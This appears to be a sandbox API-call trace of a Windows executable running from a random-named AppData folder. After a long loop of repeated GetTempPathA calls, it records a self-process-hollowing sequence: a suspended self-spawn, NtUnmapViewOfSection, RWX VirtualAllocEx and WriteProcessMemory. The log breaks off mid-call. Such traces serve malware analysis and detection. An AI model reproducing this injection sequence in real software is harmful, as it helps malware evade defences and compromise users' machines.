GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.695] VirtualProtect (in: lpAddress=0x683338, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0093.696] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0093.697] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0093.697] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0093.697] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0093.698] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0093.698] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0093.698] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0093.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0093.698] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0093.698] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0093.698] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0093.698] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0093.698] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0093.698] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0093.698] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0093.698] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0093.699] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x8013c [0093.754] PostMessageA (hWnd=0x8013c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0093.754] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0093.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1d0000 [0093.754] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1d0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.754] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.754] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xaec, dwThreadId=0xaf0)) returned 1 [0093.756] VirtualFree (lpAddress=0x1d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.756] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1d0000 [0093.756] GetThreadContext (in: hThread=0x48, lpContext=0x1d0000 | out: lpContext=0x1d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0093.824] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0093.824] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0093.824] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0093.824] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x6845d8*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x6845d8*, lpNumberOfBytesWritten=0x0) returned 1 [0093.825] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, 